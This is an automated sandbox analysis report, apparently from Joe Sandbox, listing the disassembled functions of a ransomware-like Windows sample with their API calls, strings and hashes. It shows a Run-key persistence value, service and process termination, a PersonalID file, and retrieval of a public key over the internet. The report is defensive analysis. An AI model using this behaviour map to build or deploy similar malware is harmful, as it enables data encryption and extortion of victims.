                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateFileInitializeInstancePathRemoveSpecUninitialize_memsetlstrcpy
                    • String ID: --Task$Comment$Time Trigger Task
                    • API String ID: 330603062-1376107329
                    • Opcode ID: 4f76096c1bb55b8fd6772bfaf79823c9e02c83c8f45e810a8838bdd484e9cb7f
                    • Instruction ID: 3ca8ca325a9fd4b6db29fab4a8cd6851ae340f1496bb62272076f21ffc706129
                    • Opcode Fuzzy Hash: 4f76096c1bb55b8fd6772bfaf79823c9e02c83c8f45e810a8838bdd484e9cb7f
                    • Instruction Fuzzy Hash: E051F670A40209AFDB00DF94CC99FAE7BB9FF88705F208469F505AB2A0DB75A945CF54
                    Function 00411A10 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 63servicesleepCOMMON
                    Download Yara Rule
                    APIs
                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000001), ref: 00411A1D
                    • OpenServiceW.ADVAPI32(00000000,MYSQL,00000020), ref: 00411A32
                    • ControlService.ADVAPI32(00000000,00000001,?), ref: 00411A46
                    • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00411A5B
                    • Sleep.KERNEL32(?), ref: 00411A75
                    • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00411A80
                    • CloseServiceHandle.ADVAPI32(00000000), ref: 00411A9E
                    • CloseServiceHandle.ADVAPI32(00000000), ref: 00411AA1
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: Service$CloseHandleOpenQueryStatus$ControlManagerSleep
                    • String ID: MYSQL
                    • API String ID: 2359367111-1651825290
                    • Opcode ID: 692faa110e64916c7c56b6385ee5ad1bce035bf71229861a57ca5c091c1d7d7f
                    • Instruction ID: 28721974f2ef8f77e49d09c1c1511d7c7b7ffc9f5d452c27f8aea73f5df61dea
                    • Opcode Fuzzy Hash: 692faa110e64916c7c56b6385ee5ad1bce035bf71229861a57ca5c091c1d7d7f
                    • Instruction Fuzzy Hash: 7F117735A01209ABDB209BD59D88FEF7FACEF45791F040122FB08D2250D728D985CAA8
                    Function 0044F26C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 58COMMON
                    Download Yara Rule
                    APIs
                    • std::exception::exception.LIBCMT ref: 0044F27F
                      • Part of subcall function 00430CFC: std::exception::_Copy_str.LIBCMT ref: 00430D15
                    • __CxxThrowException@8.LIBCMT ref: 0044F294
                      • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                    • std::exception::exception.LIBCMT ref: 0044F2AD
                    • __CxxThrowException@8.LIBCMT ref: 0044F2C2
                    • std::regex_error::regex_error.LIBCPMT ref: 0044F2D4
                      • Part of subcall function 0044EF74: std::exception::exception.LIBCMT ref: 0044EF8E
                    • __CxxThrowException@8.LIBCMT ref: 0044F2E2
                    • std::exception::exception.LIBCMT ref: 0044F2FB
                    • __CxxThrowException@8.LIBCMT ref: 0044F310
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaisestd::exception::_std::regex_error::regex_error
                    • String ID: bad function call
                    • API String ID: 2464034642-3612616537
                    • Opcode ID: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                    • Instruction ID: b7a33952e270e61bb8336860f47bfa26d0287e47148adb1a9e07c7a629f44a3a
                    • Opcode Fuzzy Hash: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                    • Instruction Fuzzy Hash: 60110A74D0020DBBCB04FFA5D566CDDBB7CEA04348F408A67BD2497241EB78A7498B99
                    Function 00465480 Relevance: 15.2, APIs: 7, Strings: 3, Instructions: 172COMMON
                    Download Yara Rule
                    APIs
                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,00000000,?,?,00000000), ref: 004654C8
                    • GetLastError.KERNEL32(?,?,00000000), ref: 004654D4
                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,?,00000000), ref: 004654F7
                    • GetLastError.KERNEL32(?,?,00000000), ref: 00465503
                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,?,00000000,?,?,00000000), ref: 00465531
                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,00000008,?,00000000,?,?,00000000), ref: 0046555B
                    • GetLastError.KERNEL32(.\crypto\bio\bss_file.c,000000A9,?,00000000,?,?,00000000), ref: 004655F5
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: ByteCharMultiWide$ErrorLast
                    • String ID: ','$.\crypto\bio\bss_file.c$fopen('
                    • API String ID: 1717984340-2085858615
                    • Opcode ID: 5bed85aa8c1b563afb7458887addcfa84ee938cd819de717f6d53dc9ad9ea7b7
                    • Instruction ID: 21cfcf061b86b0f752f7d9b12bec731e5652c25b667fcf3b1ac9b742683446ef
                    • Opcode Fuzzy Hash: 5bed85aa8c1b563afb7458887addcfa84ee938cd819de717f6d53dc9ad9ea7b7
                    • Instruction Fuzzy Hash: 5A518E71B40704BBEB206B61DC47FBF7769AF05715F40012BFD05BA2C1E669490186AB
                    Function 00425B6E Relevance: 15.1, APIs: 10, Instructions: 131COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__wsetlocale_nolock
                    • String ID:
                    • API String ID: 790675137-0
                    • Opcode ID: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
                    • Instruction ID: 0fe30f67420a0b57e0336c9221d2143c2ac41a82f10de3dc78134a272e9def7d
                    • Opcode Fuzzy Hash: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
                    • Instruction Fuzzy Hash: BE412932700724AFDB11AFA6B886B9E7BE0EF44318F90802FF51496282DB7D9544DB1D
                    Function 0040C740 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 254COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00420FDD: __wfsopen.LIBCMT ref: 00420FE8
                    • _fgetws.LIBCMT ref: 0040C7BC
                    • _memmove.LIBCMT ref: 0040C89F
                    • CreateDirectoryW.KERNEL32(C:\SystemID,00000000), ref: 0040C94B
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateDirectory__wfsopen_fgetws_memmove
                    • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
                    • API String ID: 2864494435-54166481
                    • Opcode ID: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                    • Instruction ID: 3a80d152ee3a33a632d987be3a831cd6f981e29f6d1810208bb328cacc5ceb60
                    • Opcode Fuzzy Hash: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                    • Instruction Fuzzy Hash: 449193B2E00219DBCF20DFA5D9857AFB7B5AF04304F54463BE805B3281E7799A44CB99
                    Function 00412440 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 52processCOMMON
                    Download Yara Rule
                    APIs
                    • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 0041244F
                    • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00412469
                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 004124A1
                    • TerminateProcess.KERNEL32(00000000,00000009), ref: 004124B0
                    • CloseHandle.KERNEL32(00000000), ref: 004124B7
                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 004124C1
                    • CloseHandle.KERNEL32(00000000), ref: 004124CD
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                    • String ID: cmd.exe
                    • API String ID: 2696918072-723907552
                    • Opcode ID: 577ed8ed9705958fd2e422ac99cb6a94193351d2856dfe9262a659f2a85694a3
                    • Instruction ID: b239e8364e8e77cb7af63d5752a1eab109cf3eb7ce5fcb3b526656d556a9da04
                    • Opcode Fuzzy Hash: 577ed8ed9705958fd2e422ac99cb6a94193351d2856dfe9262a659f2a85694a3
                    • Instruction Fuzzy Hash: ED0192355012157BE7206BA1AC89FAF766CEB08714F0400A2FD08D2141EA6489408EB9
                    Function 0040F310 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 311libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • LoadLibraryW.KERNEL32(Shell32.dll), ref: 0040F338
                    • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 0040F353
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: SHGetFolderPathW$Shell32.dll$\
                    • API String ID: 2574300362-2555811374
                    • Opcode ID: be864d8308790b92be5507a70b6add5af3086b64f5ec129cc261dae8a5d69eb3
                    • Instruction ID: 879cb2c41796572bb27552663435674e3d239ec9c812fe4031d18dca963833e9
                    • Opcode Fuzzy Hash: be864d8308790b92be5507a70b6add5af3086b64f5ec129cc261dae8a5d69eb3
                    • Instruction Fuzzy Hash: DFC15A70D00209EBDF10DFA4DD85BDEBBB5AF14308F10443AE405B7291EB79AA59CB99
                    Function 0040CBA0 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 240COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: _malloc$__except_handler4_fprintf
                    • String ID: &#160;$Error encrypting message: %s$\\n
                    • API String ID: 1783060780-3771355929
                    • Opcode ID: 779349bd5cffae9da37cda92e0556b786322a556b4ba80c6d8d46dbb3173291c
                    • Instruction ID: bc568b6946d652cfd5b4c77746d66a5f57144f99ddafb1662d710ebef24806c3
                    • Opcode Fuzzy Hash: 779349bd5cffae9da37cda92e0556b786322a556b4ba80c6d8d46dbb3173291c
                    • Instruction Fuzzy Hash: 10A196B1C00249EBEF10EF95DD46BDEBB75AF10308F54052DE40576282D7BA5688CBAA
                    Function 00463350 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 148COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: _strncmp
                    • String ID: .\crypto\pem\pem_lib.c$DEK-Info: $ENCRYPTED$Proc-Type:
                    • API String ID: 909875538-2908105608
                    • Opcode ID: ab3012ab59146815ebf28714d7aa14745dda8ec0f3d5ba1861611fdbbd5b6dc0
                    • Instruction ID: 5da15f4c8f0622be9955200bbf206a62195e74188b9aea783317ae4bc8ba6fc6
                    • Opcode Fuzzy Hash: ab3012ab59146815ebf28714d7aa14745dda8ec0f3d5ba1861611fdbbd5b6dc0
                    • Instruction Fuzzy Hash: B7413EA1BC83C129F721592ABC03F9763854B51B17F080467FA88E52C3FB9D8987419F
                    Function 0040C6A0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 49registryCOMMON
                    Download Yara Rule
                    APIs
                    • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,?), ref: 0040C6C2
                    • RegQueryValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,?), ref: 0040C6F3
                    • RegCloseKey.ADVAPI32(00000000), ref: 0040C700
                    • RegSetValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,00000004), ref: 0040C725
                    • RegCloseKey.ADVAPI32(00000000), ref: 0040C72E
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseValue$OpenQuery
                    • String ID: Software\Microsoft\Windows\CurrentVersion$SysHelper
                    • API String ID: 3962714758-1667468722
                    • Opcode ID: 1b3e89e7960631348278952d172054be4d8a3531237e516afd507403cd6f8071
                    • Instruction ID: 83d53c3b81c5c3826f22504a9cab54a14a7287ca0244f3776693af22b4817dfa
                    • Opcode Fuzzy Hash: 1b3e89e7960631348278952d172054be4d8a3531237e516afd507403cd6f8071
                    • Instruction Fuzzy Hash: 60112D7594020CFBDB109F91CC86FEEBB78EB04708F2041A5FA04B22A1D7B55B14AB58
                    Function 0041E6E8 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 44stringnetworkfileCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 0041E707
                      • Part of subcall function 0040C500: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C51B
                    • InternetOpenW.WININET ref: 0041E743
                    • _wcsstr.LIBCMT ref: 0041E7AE
                    • _memmove.LIBCMT ref: 0041E838
                    • lstrcpyW.KERNEL32(?,?), ref: 0041E90A
                    • lstrcatW.KERNEL32(?,&first=false), ref: 0041E93D
                    • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0041E954
                    • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0041E96F
                    • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041E98C
                    • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041E9A3
                    • lstrlenA.KERNEL32(?,00000000,00000000,000000FF), ref: 0041E9CD
                    • InternetCloseHandle.WININET(00000000), ref: 0041E9F3
                    • InternetCloseHandle.WININET(00000000), ref: 0041E9F6
                    • _strstr.LIBCMT ref: 0041EA36
                    • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EA59
                    • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EA74
                    • DeleteFileA.KERNEL32(?), ref: 0041EA82
                    • lstrlenA.KERNEL32({"public_key":",00000000,000000FF), ref: 0041EA92
                    • lstrcpyA.KERNEL32(?,?), ref: 0041EAA4
                    • lstrcpyA.KERNEL32(?,?), ref: 0041EABA
                    • lstrlenA.KERNEL32(?), ref: 0041EAC8
                    • lstrlenA.KERNEL32(00000022), ref: 0041EAE3
                    • lstrcpyW.KERNEL32(?,00000000), ref: 0041EB5B
                    • lstrlenA.KERNEL32(?), ref: 0041EB7C
                    • _malloc.LIBCMT ref: 0041EB86
                    • _memset.LIBCMT ref: 0041EB94
                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000001), ref: 0041EBAE
                    • lstrcpyW.KERNEL32(?,00000000), ref: 0041EBB6
                    • _strstr.LIBCMT ref: 0041EBDA
                    • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EC00
                    • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EC24
                    • DeleteFileA.KERNEL32(?), ref: 0041EC32
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: Path$Internetlstrcpylstrlen$Folder$AppendFile$CloseDeleteHandleOpen_memset_strstr$ByteCharMultiReadWide_malloc_memmove_wcsstrlstrcat
                    • String ID: bowsakkdestx.txt${"public_key":"
                    • API String ID: 2805819797-1771568745
                    • Opcode ID: b1c6d5b9cc7872d960cbedbbf01e77bd4c23ed7d360ca7e20ceb3fbc707119fd
                    • Instruction ID: c8d03ce4d59ef2fdab541fe9505dce31f646fa9b39186cada3cd653a8fd1c75a
                    • Opcode Fuzzy Hash: b1c6d5b9cc7872d960cbedbbf01e77bd4c23ed7d360ca7e20ceb3fbc707119fd
                    • Instruction Fuzzy Hash: 3901D234448391ABD630DF119C45FDF7B98AF51304F44482EFD8892182EF78A248879B
                    Function 004573F0 Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 251COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: __aulldvrm
                    • String ID: $+$0123456789ABCDEF$0123456789abcdef$UlE
                    • API String ID: 1302938615-3129329331
                    • Opcode ID: 46cac4d1b6a149b0db06dd79d6caabf4c5257fe28ada6b330817daa996fb75e4
                    • Instruction ID: ba297de4fec08f8b73c8771b24cc4328c1ae3ea447eff3a94226dc6813255680
                    • Opcode Fuzzy Hash: 46cac4d1b6a149b0db06dd79d6caabf4c5257fe28ada6b330817daa996fb75e4
                    • Instruction Fuzzy Hash: D181AEB1A087509FD710CF29A84062BBBE5BFC9755F15092EFD8593312E338DD098B96
                    Function 004306EC Relevance: 10.6, APIs: 7, Instructions: 84COMMON
                    Download Yara Rule
                    APIs
                    • ___unDName.LIBCMT ref: 0043071B
                    • _strlen.LIBCMT ref: 0043072E
                    • __lock.LIBCMT ref: 0043074A
                    • _malloc.LIBCMT ref: 0043075C
                    • _malloc.LIBCMT ref: 0043076D
                    • _free.LIBCMT ref: 004307B6
                      • Part of subcall function 004242FD: IsProcessorFeaturePresent.KERNEL32(00000017,004242D1,i;B,?,?,00420CE9,0042520D,?,004242DE,00000000,00000000,00000000,00000000,00000000,0042981C), ref: 004242FF
                    • _free.LIBCMT ref: 004307AF
                      • Part of subcall function 00420BED: HeapFree.KERNEL32(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
                      • Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free_malloc$ErrorFeatureFreeHeapLastNamePresentProcessor___un__lock_strlen
                    • String ID:
                    • API String ID: 3704956918-0
                    • Opcode ID: 32e7d4c3d8e68485970837e3b5b585c67490908ba1c4539466c19c6bf2906932
                    • Instruction ID: 67f118bcdaa5faec8c00adc58c02bfbdeebce6865ed580ae06d436c8457e8144
                    • Opcode Fuzzy Hash: 32e7d4c3d8e68485970837e3b5b585c67490908ba1c4539466c19c6bf2906932
                    • Instruction Fuzzy Hash: 3121DBB1A01715ABD7219B75D855B2FB7D4AF08314F90922FF4189B282DF7CE840CA98
                    Function 00411B10 Relevance: 10.6, APIs: 7, Instructions: 50timewindowsleepCOMMON
                    Download Yara Rule
                    APIs
                    • timeGetTime.WINMM ref: 00411B1E
                    • timeGetTime.WINMM ref: 00411B29
                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411B4C
                    • DispatchMessageW.USER32(?), ref: 00411B5C
                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411B6A
                    • Sleep.KERNEL32(00000064), ref: 00411B72
                    • timeGetTime.WINMM ref: 00411B78
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: MessageTimetime$Peek$DispatchSleep
                    • String ID:
                    • API String ID: 3697694649-0
                    • Opcode ID: fcc8413cfddb585fd402253dfe517567f0959867a63999003a9cc793a607e07b
                    • Instruction ID: 47d0c5dc5d1eae46eaa001befe89e32fbe66e83151f6641dec248f991c3ab793
                    • Opcode Fuzzy Hash: fcc8413cfddb585fd402253dfe517567f0959867a63999003a9cc793a607e07b
                    • Instruction Fuzzy Hash: EE017532A40319A6DB2097E59C81FEEB768AB44B40F044066FB04A71D0E664A9418BA9
                    Function 00425141 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                    Download Yara Rule
                    APIs
                    • __init_pointers.LIBCMT ref: 00425141
                      • Part of subcall function 00427D6C: EncodePointer.KERNEL32(00000000,?,00425146,00423FFE,00507990,00000014), ref: 00427D6F
                      • Part of subcall function 00427D6C: __initp_misc_winsig.LIBCMT ref: 00427D8A
                      • Part of subcall function 00427D6C: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 004326B3
                      • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 004326C7
                      • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 004326DA
                      • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 004326ED
                      • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00432700
                      • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00432713
                      • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00432726
                      • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00432739
                      • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 0043274C
                      • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0043275F
                      • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00432772
                      • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00432785
                      • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00432798
                      • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 004327AB
                      • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 004327BE
                      • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 004327D1
                    • __mtinitlocks.LIBCMT ref: 00425146
                    • __mtterm.LIBCMT ref: 0042514F
                      • Part of subcall function 004251B7: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00425154,00423FFE,00507990,00000014), ref: 00428B62
                      • Part of subcall function 004251B7: _free.LIBCMT ref: 00428B69
                      • Part of subcall function 004251B7: DeleteCriticalSection.KERNEL32(0050AC00,?,?,00425154,00423FFE,00507990,00000014), ref: 00428B8B
                    • __calloc_crt.LIBCMT ref: 00425174
                    • __initptd.LIBCMT ref: 00425196
                    • GetCurrentThreadId.KERNEL32 ref: 0042519D
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
